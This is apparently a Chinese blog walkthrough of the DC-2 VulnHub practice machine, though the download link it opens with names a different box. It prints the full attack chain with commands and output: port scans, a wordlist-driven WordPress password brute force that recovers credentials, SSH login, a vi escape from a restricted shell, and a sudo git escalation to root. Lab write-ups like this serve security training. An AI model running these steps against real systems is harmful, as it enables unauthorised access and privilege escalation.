靶机下载地址:https://www.vulnhub.com/entry/so-simple-1,515/
一、主机发现+信息收集
(一)信息收集
(二)环境变量设置
export ip=192.168.1.134
(三)端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 80/tcp open http 7744/tcp open raqmon-pdu
(四)服务信息收集
nmap -sS -sV -O -p80,7744 $ip
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) MAC Address: 00:0C:29:D5:E0:82 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(五)默认脚本扫描
nmap --script=vuln -p80,7744 $ip
PORT STATE SERVICE 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-wordpress-users: | Username found: admin | Username found: tom | Username found: jerry |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' | http-enum: | /wp-login.php: Possible admin folder | /readme.html: WordPress version: 2 | /wp-includes/images/rss.png: WordPress version 2.2 found. | /wp-includes/js/jquery/suggest.js: WordPress version 2.5 found. | /wp-includes/images/blank.gif: WordPress version 2.6 found. | /wp-includes/js/comment-reply.js: WordPress version 2.7 found. | /wp-login.php: WordPress login page. | /wp-admin/upgrade.php: WordPress login page. |_ /readme.html: Interesting, a readme. 7744/tcp open raqmon-pdu MAC Address: 00:0C:29:D5:E0:82 (VMware)
二、开始渗透
(一)80端口Web应用
我们直接访问发现并不能解析域名
WIndows 修改 C:\Windows\System32\drivers\etc\hosts 文件
Linux 修改 /etc/hosts
然后我们就访问到了
Lorem ipsum dolor sit amet, consectetur adipiscing elit.Donec augue est, auctor at nisi et, tristique tincidunt nulla.Maecenas vitae suscipit lorem, sed consectetur arcu.Nunc accumsan urna arcu, quis tincidunt justo aliquam at.Sed ullamcorper dui quis neque luctus sollicitudin sit amet vel erat.Nam faucibus rutrum purus, id varius metus feugiat vitae.Integer in finibus felis.Cras a fringilla leo.Sed turpis turpis, lobortis sed felis vitae, pretium suscipit sapien.Morbi id ultrices eros, sed suscipit metus.Sed lobortis vitae massa a blandit.Aliquam vestibulum ligula sed dictum faucibus.Nunc dui nisl, auctor ac pellentesque ut, sollicitudin non orci.Morbi vel condimentum sapien. Nullam convallis, massa id sagittis tincidunt, velit dolor malesuada sem, nec ullamcorper risus sem eu odio.Duis id bibendum neque.Praesent maximus nisi purus, vel interdum arcu cursus eget.Quisque non leo sollicitudin, egestas nunc a, aliquam nisl.Aliquam porttitor libero metus, a finibus turpis convallis sit amet.Donec non sapien orci.Sed elit nisl, fringilla in est ac, lobortis volutpat felis.Praesent eros purus, volutpat nec turpis quis, lacinia venenatis augue. Sed at turpis accumsan, sagittis dolor nec, imperdiet quam.Suspendisse massa ex, aliquam a porta sed, volutpat et ipsum.Nullam viverra at mi ut finibus.Curabitur lacinia eu elit vel vehicula.Proin orci ante, dictum a urna sodales, ullamcorper convallis ante.Nulla sit amet metus quis orci viverra rhoncus.Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae;In scelerisque, urna vitae laoreet congue, sapien magna feugiat nisi, in lobortis dolor dolor quis erat.Aliquam tincidunt auctor velit vitae suscipit.Suspendisse potenti.Nulla dictum risus ac hendrerit euismod.Etiam et quam varius, rutrum orci sed, ultricies urna.Aenean vel mi vitae arcu ornare rhoncus non et mi. Vivamus interdum nibh at ante dapibus, quis aliquam libero varius.Sed id viverra neque.Proin sit amet erat ex.Aenean dignissim dictum mauris eget sodales.Vestibulum nec dignissim neque, vitae accumsan ante.Pellentesque volutpat nibh a blandit placerat.Vivamus vitae sodales arcu, non iaculis quam.Vestibulum varius velit odio, non posuere felis faucibus eget.Aenean interdum sollicitudin bibendum.Interdum et malesuada fames ac ante ipsum primis in faucibus.Suspendisse sodales ex a ex fringilla, eu pulvinar odio porttitor.Integer leo mi, volutpat nec dui eu, gravida pharetra metus.
这里啥都翻译不出来
在这里提示我们用cewl进行信息收集
cewl dc-2 -w list.txt
cat list.txt
nec amet sit vel orci quis site non sed vitae luctus sem leo Sed ante nisi content Donec Aenean turpis wrap tincidunt dictum finibus volutpat egestas Vestibulum justo odio eget neque erat quam vestibulum sodales interdum ipsum arcu suscipit dui urna nulla tellus nibh faucibus blandit sapien nisl laoreet Suspendisse sagittis fermentum auctor cursus eros dignissim Pellentesque lacus metus Our tortor enim consectetur mauris Proin malesuada placerat rhoncus velit commodo convallis maximus posuere iaculis dolor molestie augue purus WordPress Nullam hendrerit Curabitur viverra risus porta dapibus diam nunc porttitor imperdiet lacinia lobortis felis Integer condimentum gravida aliquam semper ullamcorper navigation scelerisque Mauris entry congue ultrices vulputate header branding feugiat varius ligula Feed Nam vehicula ornare libero Praesent bibendum elit ultricies tristique Maecenas lorem euismod sollicitudin lectus Cras pulvinar Phasellus magna elementum eleifend tempus Flag rutrum primis Quisque Aliquam Morbi fringilla Etiam est Fusce pharetra accumsan Products People What venenatis efficitur another facilisis consequat Just Welcome Nunc massa pellentesque Duis Nulla cubilia Curae fames Vivamus Skip text custom Menu mattis mollis top masthead pretium contain page potenti Comments RSD colophon powered Proudly info primary main post netus habitant morbi senectus aliquet tempor you just can Interdum maybe log need cewl More passwords always better but sometimes the win them all Log one see find flag next panel adipiscing Lorem down Scroll facilisi Orci natoque penatibus magnis dis parturient montes nascetur ridiculus mus Your usual wordlists probably won work instead
我们在上面脚本扫描中得知这个站是用的wordpress,我们直接用wpscan工具
wpscan --url dc-2 -P list.txt
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.28 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://dc-2/ [192.168.1.134] [+] Started: Sun Apr 6 06:45:06 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> [+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2024-11-12T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 3.8 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=========================================> (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Performing password attack on Xmlrpc against 3 user/s [SUCCESS] - jerry / adipiscing [SUCCESS] - tom / parturient Trying admin / won Time: 00:00:31 <============================ > (684 / 1160) 58.96% ETA: ??:??:?? [!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[SUCCESS] - jerry / adipiscing [SUCCESS] - tom / parturient
成功扫到两个用户
因为开了ssh我们先去登ssh
ssh tom@192.168.1.134 -p 7744
注意需要用 -p 参数指定端口 7744 因为ssh服务的默认22端口已经被改成了7744
三、获得初始权限
我们尝试的 tom 用户成功拿到了shell初始权限
四、提权
随便输入了几个命令发现命令十分受限,我们先看一下可以执行什么命令,这个的话就是看环境变量了
echo $SHELL
/bin/rbash
echo $PATH
/home/tom/usr/bin
ls -liah /home/tom/usr/bin
tom@DC-2:~$ ls -liah /home/tom/usr/bin total 8.0K 140350 drwxr-x--- 2 tom tom 4.0K Mar 21 2019 . 140344 drwxr-x--- 3 tom tom 4.0K Mar 21 2019 .. 140352 lrwxrwxrwx 1 tom tom 13 Mar 21 2019 less -> /usr/bin/less 132585 lrwxrwxrwx 1 tom tom 7 Mar 21 2019 ls -> /bin/ls 140356 lrwxrwxrwx 1 tom tom 12 Mar 21 2019 scp -> /usr/bin/scp 140354 lrwxrwxrwx 1 tom tom 11 Mar 21 2019 vi -> /usr/bin/vi
我们发现这里只能用
less ls scp vi 这几个命令
https://gtfobins.github.io/ 用此网站查看提取命令
这里用vi进行shell逃逸
vi :set shell=/bin/sh :shell
-
打开 Vim 后,是为了先输入
:set shell=/bin/sh来设置 shell,命令行模式下,:`是开启输入命令。 -
接着输入
:shell,此时会进入到 shell 环境,你可以执行如ls查看当前目录下的文件列表、cd切换目录等各种 shell 命令。
然后修改环境变量
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:$PATH
输入之前被禁的命令find,发现可以执行成功逃逸
我们查看用户还是看到了jerry用户
ls /home
说明可以有办法登上jerry用户,只是ssh卡住,那就su切换试试
su jerry
密码 adipiscing
先看权限 sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
我们发现 jerry可以以root 权限执行git命令,那我们就可以进行提取了
https://gtfobins.github.io/gtfobins/git/
用git进行提权
TF=$(mktemp -d) ln -s /bin/sh "$TF/git-x" sudo git "--exec-path=$TF" x
直接就是root了
五、提权成功
jerry@DC-2:/home/tom$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
jerry@DC-2:/home/tom$ TF=$(mktemp -d)
jerry@DC-2:/home/tom$ ln -s /bin/sh "$TF/git-x"
jerry@DC-2:/home/tom$ sudo git "--exec-path=$TF" x
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
- THE END -
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/dc-2%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论